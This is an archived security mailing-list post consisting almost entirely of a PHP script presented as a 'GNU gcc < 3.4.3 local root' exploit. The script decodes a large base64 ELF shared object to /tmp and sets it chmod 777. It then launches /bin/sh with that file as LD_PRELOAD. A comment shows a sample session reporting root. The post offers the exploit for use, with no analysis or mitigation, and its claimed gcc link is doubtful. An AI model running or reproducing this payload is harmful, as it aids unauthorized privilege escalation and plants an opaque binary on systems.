| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY18-F2232F51F71B8CC25206EFDCF8E0@phx.gbl>
From: zzagorrzzagorr at hotmail.com (ZzagorR ZzagorR)
Subject: GNU gcc vuln. < 3.4.3 local root (.php)
#!/usr/bin/php -a
<?
/*
GNU gcc vuln. < 3.4.3
By ZzagorR (MARMARA UNIVERSITY)
zzagorrzzagorr@...mail.com
http://www.rootbinbash.com
thanks to [NST]
ah vizeler ahhhhh
*/
/*
sh-2.04$ chmod 777 gcc.php
chmod 777 gcc.php
sh-2.04$
sh-2.04$ ./gcc.php -------OR>>>>>> sh-2.04$ php gcc.php
./gcc.php
Interactive mode enabled
X-Powered-By: PHP/4.1.2
Content-type: text/html
[+] File Created
[+] chmod OK
[+] export OK
id
id
uid=0(root) gid=0(root) groups=48(apache)
uname -a
uname -a
Linux *.*****.** 2.4.9-6smp #1 SMP Thu Oct 18 09:22:57 EDT 2001 i686 unknown
cat /proc/version
cat /proc/version
Linux version 2.4.9-6smp (bhcompile@...ipples.devel.redhat.com) (gcc version
2.96 20000731 (Red Hat Linux 7.1 2.96-85)) #1 SMP Thu Oct 18 09:22:57 EDT
2001
exit
exit
uid=48(apache) gid=48(apache) groups=48(apache)
sh-2.04$
sh-2.04$
*/
$sll="f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAsAUAADQAAACQCgAAAAAAADQAIAADACgAGAAVAAEAAAAA";
$sll
.="AAAAAAAAAAAAAAB8BwAAfAcAAAUAAAAAEAAAAQAAAHwHAAB8FwAAfBcAAAwBAAAkAQAABgAAAAAQ";
$sll
.="AAACAAAAjAcAAIwXAACMFwAAwAAAAMAAAAAGAAAABAAAABEAAAAkAAAAAAAAACAAAAAhAAAAAAAA";
$sll
.="ABcAAAAWAAAAAAAAAAAAAAAeAAAAGwAAAAAAAAAdAAAAAAAAACIAAAAVAAAAIwAAAAAAAAAAAAAA";
$sll
.="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
$sll
.="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAAAAAAABoA";
$sll
.="AAAYAAAAAAAAAB8AAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJQAAAAAAAAAAwAB";
$sll
.="AAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAH4EAAAAAAAAAwAEAAAAAADIBAAA";
$sll
.="AAAAAAMABQAAAAAA+AQAAAAAAAADAAYAAAAAADAFAAAAAAAAAwAHAAAAAABIBQAAAAAAAAMACAAA";
$sll
.="AAAAcAUAAAAAAAADAAkAAAAAALAFAAAAAAAAAwAKAAAAAABgBwAAAAAAAAMACwAAAAAAfBcAAAAA";
$sll
.="AAADAAwAAAAAAIgXAAAAAAAAAwANAAAAAACMFwAAAAAAAAMADgAAAAAATBgAAAAAAAADAA8AAAAA";
$sll
.="AFQYAAAAAAAAAwAQAAAAAABcGAAAAAAAAAMAEQAAAAAAiBgAAAAAAAADABIAAAAAAAAAAAAAAAAA";
$sll
.="AwATAAAAAAAAAAAAAAAAAAMAFACHAAAA6AYAAAoAAAASAAoAfwAAANwGAAAJAAAAEgAKAAEAAACM";
$sll
.="FwAAAAAAABEA8f+OAAAA9AYAAA4AAAASAAoAYgAAAAAAAAAnAAAAIgAAAHgAAADQBgAACQAAABIA";
$sll
.="CgAvAAAASAUAAAAAAAASAAgASgAAAAAAAAAjAAAAIgAAAKcAAACIGAAAAAAAABEA8f81AAAAYAcA";
$sll
.="AAAAAAASAAsAOwAAAAAAAAB7AAAAIgAAAKAAAACIGAAAAAAAABEA8f8KAAAAXBgAAAAAAAARAPH/";
$sll
.="swAAAKAYAAAAAAAAEQDx/yAAAAAAAAAAAAAAACAAAAAAX0RZTkFNSUMAX0dMT0JBTF9PRkZTRVRf";
$sll
.="VEFCTEVfAF9fZ21vbl9zdGFydF9fAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZGVyZWdp";
$sll
.="c3Rlcl9mcmFtZV9pbmZvAF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBnZXR1aWQAZ2V0ZXVpZABnZXRn";
$sll
.="aWQAZ2V0ZWdpZABsaWJjLnNvLjYAX2VkYXRhAF9fYnNzX3N0YXJ0AF9lbmQAR0xJQkNfMi4xLjMA";
$sll
.="R0xJQkNfMi4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAB";
$sll
.="AAEAAgABAAEAAgABAAEAAwABAAEAAQAAAAAAAQACAJYAAAAQAAAAAAAAAHMfaQkAAAMAuAAAABAA";
$sll
.="AAAQaWkNAAACAMQAAAAAAAAAfBcAAAgAAACAFwAACAAAAHgYAAAIAAAAdBgAAAYZAAB8GAAABhwA";
$sll
.="AIAYAAAGHwAAhBgAAAYjAABoGAAABxkAAGwYAAAHHAAAcBgAAAcfAABVieWD7BRT6AAAAABbgcMI";
$sll
.="EwAA6FAAAADoGwEAAOimAQAAW8nDAAAA/7MEAAAA/6MIAAAAAAAAAP+jDAAAAGgAAAAA6eD/////";
$sll
.="oxAAAABoCAAAAOnQ/////6MUAAAAaBAAAADpwP///1WJ5YPsFFPoAAAAAFuBw6ASAACLgygAAACF";
$sll
.="wHQC/9BbycOJ9pCQkJCQkJCQkJCQkFWJ5YPsFFPoAAAAAFuBw3ASAACDuyj///8AdWSDuyQAAAAA";
$sll
.="dC6DxPSLgxwAAAD/MOiL////g8QQ6xmNtgAAAACLgyT///+NUASJkyT///+LAP/Qi4Mk////gzgA";
$sll
.="deKDuyAAAAAAdA+DxPSNgyz///9Q6Dr////Hgyj///8BAAAAi13oycONdgBVieWD7BRT6AAAAABb";
$sll
.="gcPoEQAAW8nDifZVieWD7BRT6AAAAABbgcPQEQAAg7sYAAAAAHQWg8T4jYMsAAAAUI2DLP///1Do";
$sll
.="zv7//4td6MnDkFWJ5YPsFFPoAAAAAFuBw5gRAABbycOJ9lWJ5THA6wDJw412AFWJ5THA6wDJw412";
$sll
.="AFWJ5THA6wGQycOJ9lWJ5THA6wWQjXQmAMnDjbQmAAAAAI28JwAAAABVieWD7BBWU+gAAAAAW4HD";
$sll
.="PxEAAI2z8P///4O78P////90DIsG/9CDxvyDPv919FteycOQVYnlg+wUU+gAAAAAW4HDDBEAAFvJ";
$sll
.="w422AAAAAFWJ5YPsFFPoAAAAAFuBw/AQAACQ6Gf+//9bycN8FwAAWBgAAAAAAAAAAAAAAQAAAJYA";
$sll
.="AAAMAAAASAUAAA0AAABgBwAABAAAAJQAAAAFAAAAsAMAAAYAAABwAQAACgAAAM4AAAALAAAAEAAA";
$sll
.="AAMAAABcGAAAAgAAABgAAAAUAAAAEQAAABcAAAAwBQAAEQAAAPgEAAASAAAAOAAAABMAAAAIAAAA";
$sll
.="/v//b8gEAAD///9vAQAAAPD//29+BAAA+v//bwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
$sll
.="AAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAIwXAAAAAAAAAAAAAIYFAACWBQAApgUAAAAA";
$sll
.="AAB8FwAAAAAAAAAAAAAAAAAAAEdDQzogKEdOVSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJl";
$sll
.="cmVsZWFzZSkAAEdDQzogKEdOVSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkA";
$sll
.="AEdDQzogKEdOVSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkAAEdDQzogKEdO";
$sll
.="VSkgMi45NS40IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkAAEdDQzogKEdOVSkgMi45NS40";
$sll
.="IDIwMDExMDAyIChEZWJpYW4gcHJlcmVsZWFzZSkACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAAAAAA";
$sll
.="AAEAAAAwMS4wMQAAAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAA";
$sll
.="AAAAAAEAAAAwMS4wMQAAAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0A";
$sll
.="LmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmlu";
$sll
.="aXQALnRleHQALmZpbmkALmRhdGEALmVoX2ZyYW1lAC5keW5hbWljAC5jdG9ycwAuZHRvcnMALmdv";
$sll
.="dAAuYnNzAC5jb21tZW50AC5ub3RlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
$sll
.="AAAAAAAAAAAbAAAABQAAAAIAAACUAAAAlAAAANwAAAACAAAAAAAAAAQAAAAEAAAAIQAAAAsAAAAC";
$sll
.="AAAAcAEAAHABAABAAgAAAwAAABUAAAAEAAAAEAAAACkAAAADAAAAAgAAALADAACwAwAAzgAAAAAA";
$sll
.="AAAAAAAAAQAAAAAAAAAxAAAA////bwIAAAB+BAAAfgQAAEgAAAACAAAAAAAAAAIAAAACAAAAPgAA";
$sll
.="AP7//28CAAAAyAQAAMgEAAAwAAAAAwAAAAEAAAAEAAAAAAAAAE0AAAAJAAAAAgAAAPgEAAD4BAAA";
$sll
.="OAAAAAIAAAAAAAAABAAAAAgAAABWAAAACQAAAAIAAAAwBQAAMAUAABgAAAACAAAACQAAAAQAAAAI";
$sll
.="AAAAXwAAAAEAAAAGAAAASAUAAEgFAAAlAAAAAAAAAAAAAAAEAAAAAAAAAFoAAAABAAAABgAAAHAF";
$sll
.="AABwBQAAQAAAAAAAAAAAAAAABAAAAAQAAABlAAAAAQAAAAYAAACwBQAAsAUAALABAAAAAAAAAAAA";
$sll
.="ABAAAAAAAAAAawAAAAEAAAAGAAAAYAcAAGAHAAAcAAAAAAAAAAAAAAAEAAAAAAAAAHEAAAABAAAA";
$sll
.="AwAAAHwXAAB8BwAADAAAAAAAAAAAAAAABAAAAAAAAAB3AAAAAQAAAAMAAACIFwAAiAcAAAQAAAAA";
$sll
.="AAAAAAAAAAQAAAAAAAAAgQAAAAYAAAADAAAAjBcAAIwHAADAAAAAAwAAAAAAAAAEAAAACAAAAIoA";
$sll
.="AAABAAAAAwAAAEwYAABMCAAACAAAAAAAAAAAAAAABAAAAAAAAACRAAAAAQAAAAMAAABUGAAAVAgA";
$sll
.="AAgAAAAAAAAAAAAAAAQAAAAAAAAAmAAAAAEAAAADAAAAXBgAAFwIAAAsAAAAAAAAAAAAAAAEAAAA";
$sll
.="BAAAAJ0AAAAIAAAAAwAAAIgYAACICAAAGAAAAAAAAAAAAAAABAAAAAAAAACiAAAAAQAAAAAAAAAA";
$sll
.="AAAAiAgAAPAAAAAAAAAAAAAAAAEAAAAAAAAAqwAAAAcAAAAAAAAAAAAAAHgJAABkAAAAAAAAAAAA";
$sll
.="AAABAAAAAAAAABEAAAADAAAAAAAAAAAAAADcCQAAsQAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAgAA";
$sll
.="AAAAAAAAAAAAUA4AACAEAAAXAAAAMwAAAAQAAAAQAAAACQAAAAMAAAAAAAAAAAAAAHASAADbAQAA";
$sll
.="AAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlAAAAAAAAAADAAEAAAAAAHABAAAA";
$sll
.="AAAAAwACAAAAAACwAwAAAAAAAAMAAwAAAAAAfgQAAAAAAAADAAQAAAAAAMgEAAAAAAAAAwAFAAAA";
$sll
.="AAD4BAAAAAAAAAMABgAAAAAAMAUAAAAAAAADAAcAAAAAAEgFAAAAAAAAAwAIAAAAAABwBQAAAAAA";
$sll
.="AAMACQAAAAAAsAUAAAAAAAADAAoAAAAAAGAHAAAAAAAAAwALAAAAAAB8FwAAAAAAAAMADAAAAAAA";
$sll
.="iBcAAAAAAAADAA0AAAAAAIwXAAAAAAAAAwAOAAAAAABMGAAAAAAAAAMADwAAAAAAVBgAAAAAAAAD";
$sll
.="ABAAAAAAAFwYAAAAAAAAAwARAAAAAACIGAAAAAAAAAMAEgAAAAAAAAAAAAAAAAADABMAAAAAAAAA";
$sll
.="AAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAAAAAAAAADABYAAAAAAAAAAAAAAAAAAwAX";
$sll
.="AAEAAACwBQAAAAAAAAAACgAQAAAAsAUAAAAAAAACAAoAIAAAAAAAAAAAAAAABADx/wEAAADgBQAA";
$sll
.="AAAAAAAACgArAAAAgBcAAAAAAAABAAwALwAAAFQYAAAAAAAAAQAQAD0AAACEFwAAAAAAAAEADABJ";
$sll
.="AAAA4AUAAAAAAAACAAoAXwAAAIgXAAAAAAAAAQANAHIAAABoBgAAAAAAAAIACgB9AAAAiBgAABgA";
$sll
.="AAABABIAhwAAAIAGAAAAAAAAAgAKAJMAAAC4BgAAAAAAAAIACgCeAAAAiBcAAAAAAAABAAwArAAA";
$sll
.="AEwYAAAAAAAAAQAPACAAAAAAAAAAAAAAAAQA8f8BAAAAEAcAAAAAAAAAAAoAugAAABAHAAAAAAAA";
$sll
.="AgAKANAAAABQGAAAAAAAAAEADwCTAAAARAcAAAAAAAACAAoAngAAAIgXAAAAAAAAAQAMAN0AAABY";
$sll
.="GAAAAAAAAAEAEADqAAAAiBcAAAAAAAABAA0AAQAAAGAHAAAAAAAAAAAKAPgAAAAAAAAAAAAAAAQA";
$sll
.="8f8BAAAA0AYAAAAAAAAAAAoA/gAAAHwXAAAAAAAAAQIMAAsBAADoBgAACgAAABIACgASAQAA3AYA";
$sll
.="AAkAAAASAAoAGgEAAIwXAAAAAAAAEQDx/yMBAAD0BgAADgAAABIACgArAQAAAAAAACcAAAAiAAAA";
$sll
.="TAEAANAGAAAJAAAAEgAKAFMBAABIBQAAAAAAABIACABZAQAAAAAAACMAAAAiAAAAfAEAAIgYAAAA";
$sll
.="AAAAEQDx/4gBAABgBwAAAAAAABIACwCOAQAAAAAAAHsAAAAiAAAAqgEAAIgYAAAAAAAAEQDx/7EB";
$sll
.="AABcGAAAAAAAABEA8f/HAQAAoBgAAAAAAAARAPH/zAEAAAAAAAAAAAAAIAAAAABnY2MyX2NvbXBp";
$sll
.="bGVkLgBjYWxsX2dtb25fc3RhcnQAY3J0c3R1ZmYuYwBwLjMAX19EVE9SX0xJU1RfXwBjb21wbGV0";
$sll
.="ZWQuNABfX2RvX2dsb2JhbF9kdG9yc19hdXgAX19FSF9GUkFNRV9CRUdJTl9fAGZpbmlfZHVtbXkA";
$sll
.="b2JqZWN0LjExAGZyYW1lX2R1bW15AGluaXRfZHVtbXkAZm9yY2VfdG9fZGF0YQBfX0NUT1JfTElT";
$sll
.="VF9fAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJB";
$sll
.="TUVfRU5EX18AbnN0LmMAX19kc29faGFuZGxlAGdldGdpZABnZXRldWlkAF9EWU5BTUlDAGdldGVn";
$sll
.="aWQAX19yZWdpc3Rlcl9mcmFtZV9pbmZvQEBHTElCQ18yLjAAZ2V0dWlkAF9pbml0AF9fZGVyZWdp";
$sll
.="c3Rlcl9mcmFtZV9pbmZvQEBHTElCQ18yLjAAX19ic3Nfc3RhcnQAX2ZpbmkAX19jeGFfZmluYWxp";
$sll
.="emVAQEdMSUJDXzIuMS4zAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABfX2dtb25f";
$sll .="c3RhcnRfXwA=";
echo("By ZzagorR - http://www.rootbinbash.com\n");
$sll=base64_decode($sll);
$tester1="/tmp/hellogcc";
$testw = fopen($tester1, "w");
ini_set('user_agent',__FILE__);
fwrite($testw,$sll);
fclose($testw);
echo("[+] File Created\n");
$islem1="chmod 777 /tmp/hellogcc";
$islem2="export LD_LIBRARY_PATH=/tmp";
$islem3="LD_PRELOAD=/tmp/hellogcc /bin/sh";
system($islem1);
echo("[+] chmod OK\n");
system($islem2);
echo("[+] export OK [next cmd:id+enter:)]\n");
system($islem3);
system("id");
?>
_________________________________________________________________
Hem e-postalarinizi, hem de Bilgisayarinizi MSN Güvenlik ile koruma altina
alin! http://www.msn.com.tr/security/
Powered by blists - more mailing lists